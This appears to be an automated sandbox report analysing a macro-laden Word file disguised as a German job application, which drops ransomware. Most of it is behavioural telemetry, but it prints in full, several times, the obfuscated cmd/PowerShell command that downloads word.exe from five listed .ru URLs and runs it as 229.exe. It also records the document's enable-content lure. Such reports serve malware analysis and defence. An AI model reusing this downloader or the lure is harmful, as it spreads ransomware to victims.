Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\SmartArt Graphics\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\SmartArt Graphics\1033\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UProof\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Word\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Extensions\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\bookmarkbackups\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\events\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\WINNT_x86-msvc\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\minidumps\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Sun\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Sun\Java\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Sun\Java\Deployment\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Contacts\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\BNAGMGSPLO\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\GIGIYTFFYT\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\LSBIHQFDVT\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\MXPXCVPDVN\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\NEBFQQYWPS\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\QCOILOQIKC\PSVULHG-MANUAL.txtJump to dropped file
Source: C:\Windows\Temp\229.exeFile created: C:\Users\user\Desktop\SFPUSAFIOL\PSVULHG-MANUAL.txtJump to dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Inhalt aktivieren" im gelben Bereich und danach auf "Bearbeitung aktivieren"
Source: Document image extraction number: 0Screenshot OCR: Bearbeitung aktivieren"
Document contains an embedded VBA macro which may execute processesShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE, VBA macro line: pcbBtz = Shell(StrReverse(sYNoxQh), 0)
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 78.155.218.207 80Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 90.156.201.98 80Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 92.53.96.93 443Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 92.53.98.31 443Jump to behavior
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\229.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040803D lstrlenW,lstrlenW,wsprintfW,wsprintfW,NtSetInformationFile,GetModuleHandleW,GetProcAddress,NtSetInformationFile,NtSetInformationFile,MoveFileExW,5_2_0040803D
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: c:\windows\temp\229.exeJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Temp\229.exeMutant created: \Sessions\2\BaseNamedObjects\AversSucksForever
Deletes files inside the Windows folderShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\229.exeJump to behavior
Detected potential crypto functionShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_00415EBC5_2_00415EBC
Source: C:\Windows\Temp\229.exeCode function: 5_2_00407D0B5_2_00407D0B
Source: C:\Windows\Temp\229.exeCode function: 5_2_0041E1475_2_0041E147
Source: C:\Windows\Temp\229.exeCode function: 5_2_004343245_2_00434324
Source: C:\Windows\Temp\229.exeCode function: 5_2_0041E3AE5_2_0041E3AE
Source: C:\Windows\Temp\229.exeCode function: 5_2_004344485_2_00434448
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042EC915_2_0042EC91
Source: C:\Windows\Temp\229.exeCode function: 5_2_004234BD5_2_004234BD
Source: C:\Windows\Temp\229.exeCode function: 5_2_004216205_2_00421620
Source: C:\Windows\Temp\229.exeCode function: 5_2_0041DF135_2_0041DF13
Source: C:\Windows\Temp\229.exeCode function: 5_1_0041E1475_1_0041E147
Source: C:\Windows\Temp\229.exeCode function: 5_1_004311595_1_00431159
Source: C:\Windows\Temp\229.exeCode function: 5_1_0040E1305_1_0040E130
Source: C:\Windows\Temp\229.exeCode function: 5_1_004192755_1_00419275
Source: C:\Windows\Temp\229.exeCode function: 5_1_004343245_1_00434324
Source: C:\Windows\Temp\229.exeCode function: 5_1_0041E3AE5_1_0041E3AE
Source: C:\Windows\Temp\229.exeCode function: 5_1_004344485_1_00434448
Source: C:\Windows\Temp\229.exeCode function: 5_1_0041648B5_1_0041648B
Source: C:\Windows\Temp\229.exeCode function: 5_1_004234BD5_1_004234BD
Source: C:\Windows\Temp\229.exeCode function: 5_1_0041852C5_1_0041852C
Source: C:\Windows\Temp\229.exeCode function: 5_1_004216205_1_00421620
Source: C:\Windows\Temp\229.exeCode function: 5_1_004196AA5_1_004196AA
Source: C:\Windows\Temp\229.exeCode function: 5_1_004057C05_1_004057C0
Source: C:\Windows\Temp\229.exeCode function: 5_1_00414A705_1_00414A70
Source: C:\Windows\Temp\229.exeCode function: 5_1_00418A285_1_00418A28
Source: C:\Windows\Temp\229.exeCode function: 5_1_0040BB105_1_0040BB10
Source: C:\Windows\Temp\229.exeCode function: 5_1_0040ABD05_1_0040ABD0
Source: C:\Windows\Temp\229.exeCode function: 5_1_0042EC915_1_0042EC91
Source: C:\Windows\Temp\229.exeCode function: 5_1_00411DD05_1_00411DD0
Source: C:\Windows\Temp\229.exeCode function: 5_1_00418E405_1_00418E40
Source: C:\Windows\Temp\229.exeCode function: 5_1_0042AF595_1_0042AF59
Source: C:\Windows\Temp\229.exeCode function: 5_1_0041DF135_1_0041DF13
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Document contains embedded VBA macrosShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\Temp\229.exeCode function: String function: 00416050 appears 52 times
Source: C:\Windows\Temp\229.exeCode function: String function: 00420996 appears 47 times
Source: C:\Windows\Temp\229.exeCode function: String function: 004136FB appears 33 times
PE file contains strange resourcesShow sources
Source: 229.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.spre.phis.spyw.expl.evad.winDOC@7/398@5/4
Contains functionality to check free disk spaceShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040A4E1 VirtualAlloc,VirtualAlloc,wsprintfW,VirtualAlloc,wsprintfW,wsprintfW,VirtualAlloc,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,lstrlenW,VirtualAlloc,VirtualAlloc,lstrlenW,wsprintfW,lstrlenW,VirtualFree,VirtualAlloc,GetDriveTypeW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,5_2_0040A4E1
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040744A CreateToolhelp32Snapshot,VirtualAlloc,5_2_0040744A
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040EC32 LoadLibraryW,GetProcAddress,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateFileW,WriteFile,Sleep,CloseHandle,CoInitialize,CoCreateInstance,CreateEventW,CoUninitialize,WaitForSingleObject,5_2_0040EC32
Creates files inside the program directoryShow sources
Source: C:\Windows\Temp\229.exeFile created: C:\Program Files\PSVULHG-MANUAL.txtJump to behavior
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rah_Siedler_Bewerbungsunterlagen.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR7C05.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE document summary: title field not present or empty
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE document summary: author field not present or empty
Source: Sarah_Siedler_Bewerbungsunterlagen.docOLE document summary: edited time not present or 0
Might use command line argumentsShow sources
Source: C:\Windows\Temp\229.exeCommand line argument: update5_1_00410B20
Source: C:\Windows\Temp\229.exeCommand line argument: generate5_1_00410B20
Source: C:\Windows\Temp\229.exeCommand line argument: 8G)5_1_00410B20
Source: C:\Windows\Temp\229.exeCommand line argument: p`)5_1_00410B20
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: Sarah_Siedler_Bewerbungsunterlagen.docvirustotal: Detection: 47%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Source: unknownProcess created: C:\Windows\Temp\229.exe 'C:\windows\temp\229.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\229.exe 'C:\windows\temp\229.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\Temp\229.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.iniJump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Creates a directory in C:\Program FilesShow sources
Source: C:\Windows\Temp\229.exeDirectory created: C:\Program Files\PSVULHG-MANUAL.txtJump to behavior
Source: C:\Windows\Temp\229.exeDirectory created: C:\Program Files\3c4e07e63c4e000531d.lockJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: GoogleUpdate_unsigned.pdb source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb;;b source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source: Binary string: GoogleCrashHandler_unsigned.pdb{ source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp
Source: Binary string: C:\attr\Release\Workflows.pdb source: 229.exe, 00000005.00000002.1855800874.00437000.00000002.sdmp
Source: Binary string: mation.pdb source: powershell.exe, 00000004.00000002.1671233879.00215000.00000004.sdmp
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source: Binary string: GoogleCrashHandler_unsigned.pdb source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdb source: powershell.exe, 00000004.00000002.1675202125.0537D000.00000004.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000004.00000002.1675202125.0537D000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb( source: powershell.exe, 00000004.00000002.1675202125.0537D000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1672317892.01BB0000.00000002.sdmp
Source: Binary string: C:\attr\Release\Workflows.pdb( source: 229.exe, 00000005.00000002.1855800874.00437000.00000002.sdmp

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040C05D GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_0040C05D
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_00415459 push edx; retf 5_2_00415463
Source: C:\Windows\Temp\229.exeCode function: 5_2_00414E99 push ebx; ret 5_2_00414EAB
Source: C:\Windows\Temp\229.exeCode function: 5_2_00415144 push edx; ret 5_2_00415145
Source: C:\Windows\Temp\229.exeCode function: 5_2_00415974 push edx; iretd 5_2_0041597F
Source: C:\Windows\Temp\229.exeCode function: 5_2_00414FE7 push es; retf 5_2_00414FF0
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042B8B6 push esp; retf 5_2_0042B8B7
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042B2B8 push esp; retf 5_2_0042B2C0
Source: C:\Windows\Temp\229.exeCode function: 5_1_00416096 push ecx; ret 5_1_004160A9
Source: C:\Windows\Temp\229.exeCode function: 5_1_00415A9E push ecx; ret 5_1_00415AB1

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExecutable created and started: c:\windows\temp\229.exeJump to behavior
Infects executable files (exe, dll, sys, html)Show sources
Source: C:\Windows\Temp\229.exeSystem file written: C:\Users\user\AppData\Roaming\.jre\Welcome.htmlJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\229.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\229.exeJump to dropped file
Searches for installed JRE in non-default directoryShow sources
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\bin\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\bin\client\ read data or list directory | synchronizeJump to behavior
